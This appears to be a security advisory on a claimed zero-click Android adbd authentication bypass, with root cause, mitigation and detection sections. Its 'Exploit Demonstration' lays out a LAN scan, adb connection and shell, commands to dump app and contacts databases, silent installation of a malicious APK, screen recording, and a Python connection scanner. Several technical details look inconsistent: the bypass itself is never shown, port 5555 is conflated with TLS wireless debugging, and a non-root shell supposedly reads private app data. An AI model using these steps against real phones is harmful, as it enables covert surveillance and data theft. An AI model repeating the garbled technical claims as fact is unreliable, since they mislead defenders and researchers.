Zero‑Click Android ADB Flaw Lets Attackers Gain Remote Shell Without Interaction

1. Vulnerability Overview

CVE‑2026‑0073 is a critical authentication‑bypass vulnerability in the Android Debug Bridge daemon (adbd), part of the Project Mainline module. The flaw allows an attacker on the same local network to bypass wireless ADB’s mutual TLS authentication and obtain remote shell access without any user interaction. Severity is marked as Critical. The vulnerability is fixed in the Security Patch Level 2026‑05‑01. Affected Android versions that have not received this patch include Android 14, Android 15, Android 16, and Android 16 QPR2.

2. Technical Deep Dive

2.1 Wireless Debugging Recap

Wireless debugging, introduced in Android 11, lets developers connect to a device over Wi‑Fi using adbd. The process involves mDNS service discovery, where the device advertises a random TCP port, and TLS mutual authentication, requiring both the device and the host to verify each other’s certificates. Paired public keys are stored in /data/misc/adb/adb_keys for subsequent verification.

2.2 Root Cause: Logic Error in adbd_tls_verify_cert

The flaw resides in auth.cpp within the function adbd_tls_verify_cert. This function should perform four checks: signature validity, certificate validity period, match with stored pairing keys, and appropriate usage constraints. Due to a logic error, crafted input can bypass all four checks, allowing the attacker to present any certificate and be treated as an authenticated host.

2.3 Why It Is a “Zero‑Click” Vulnerability

The attack requires no user interaction. The steps are:

Attacker is on the same LAN (e.g., hotel Wi‑Fi, corporate network).

Uses mDNS to discover devices with wireless debugging enabled.

Sends a specially crafted packet that triggers the faulty adbd_tls_verify_cert logic.

Gains immediate shell access.

This fully automated chain makes the vulnerability especially dangerous in shared network environments.

3. Exploit Demonstration

3.1 Prerequisites

Wireless debugging is enabled on the target device.

Attacker shares the same LAN segment with the device.

The device has not installed the May 2026 security patch.

3.2 Attack Flow

Discovery of vulnerable devices can be done with nmap or the adb discover command:

# Scan port 5555 (default wireless ADB port) on a /24 subnet
nmap -p 5555 192.168.1.0/24 --open

# Or use adb's discovery feature
adb kill-server
adb start-server

After a device is identified, the attacker attempts a connection:

# Attempt to connect to the target IP
adb connect <target_ip_address>:5555

If the device is vulnerable, the connection succeeds without any credentials. The attacker then obtains a shell:

# Get a shell on the device
adb shell

The shell runs as the Android "shell" user, which, while not root, provides substantial control.

3.3 Post‑Exploitation Capabilities

With shell access the attacker can:

Data extraction : read app databases, contacts, SMS, and user files.

# Read an app database
cat /data/data/com.example.app/databases/app.db

# Dump contacts database
cat /data/data/com.android.providers.contacts/databases/contacts2.db

# List user files
ls /storage/emulated/0/

Malicious app installation :

# Install a malicious APK
adb install malicious.apk

# Silent install (no user confirmation)
pm install -r malicious.apk

Monitoring and collection :

# Capture a screenshot
screencap /sdcard/screenshot.png

# Record the screen
screenrecord /sdcard/video.mp4

# View live logs
logcat

Privilege‑escalation preparation : although the shell is non‑root, the attacker can chain other vulnerabilities or misconfigurations to obtain higher privileges.

3.4 Network‑Scanning Script (Python)

#!/usr/bin/env python3
"""
CVE-2026-0073 verification script (research use only)
"""
import socket, subprocess, time

def scan_for_vulnerable_devices(network_range, port=5555):
    """Scan the given network range for devices with wireless ADB enabled"""
    print(f"[*] Scanning {network_range} on port {port}...")
    # Placeholder for actual scanning logic
    return []

def attempt_connection(ip, port=5555):
    """Try to connect to the target device"""
    try:
        result = subprocess.run(
            ['adb', 'connect', f"{ip}:{port}"],
            capture_output=True, text=True, timeout=5
        )
        if 'connected' in result.stdout.lower():
            print(f"[+] Successfully connected to {ip}:{port}")
            return True
    except Exception as e:
        print(f"[-] Connection failed: {e}")
    return False

def main():
    target_network = "192.168.1.0/24"  # Example range
    vulnerable_devices = scan_for_vulnerable_devices(target_network)
    for device_ip in vulnerable_devices:
        if attempt_connection(device_ip):
            print(f"[+] {device_ip} may be vulnerable to CVE-2026-0073")
            # Further verification code would go here

if __name__ == "__main__":
    main()

4. Mitigation and Fixes

4.1 Immediate Remediation

Check the Security Patch Level under Settings → About phone → Android version; ensure it is "2026‑05‑01" or later.

If not updated, go to Settings → System → Software update and install the latest OTA.

Some devices receive the adbd fix via Google Play system updates: Settings → Security & privacy → System & updates → Google Play system update.

Until the patch is applied, temporarily disable Wireless debugging: Settings → Developer options → Wireless debugging (or disable Developer options entirely).

4.2 Network‑Level Defenses

Block TCP port 5555 inbound and outbound on enterprise firewalls.

Enforce 802.1X network access control to prevent unknown devices from joining.

Apply micro‑segmentation for mobile devices to isolate them from sensitive network zones.

4.3 Detection and Response

Log analysis commands useful for spotting exploitation attempts:

# Check ADB‑related logs
adb logcat -b events | grep "adb"

# Look for unexpected shell processes
ps -A | grep shell

# Inspect unauthorized ADB pairing keys
cat /data/misc/adb/adb_keys

# Examine network connections on port 5555
netstat -tunap | grep 5555

Deploy Mobile Threat Defense (MTD) solutions such as Lookout or Zimperium to monitor anomalous behavior in real time.

5. Timeline

2026‑05‑01: Google releases May Android security bulletin and patches adbd.

2026‑05‑04: NIST NVD adds CVE‑2026‑0073 entry.

2026‑05‑05: HKCERT publishes a dedicated security advisory.

May 2026 (expected): AOSP source‑code patch released within 48 hours of the bulletin.

6. Security Recommendations Summary

For end users : promptly install the May 2026 security update and disable Wireless debugging when not needed.

For enterprise security teams : inventory Android devices with Wireless debugging enabled, push updates via MDM, block port 5555 at the firewall, and develop an incident‑response playbook for zero‑click exploits.

For mobile security researchers : study the adbd authentication flow and Project Mainline update mechanism in an isolated environment; be aware that exploit code may appear in public repositories soon.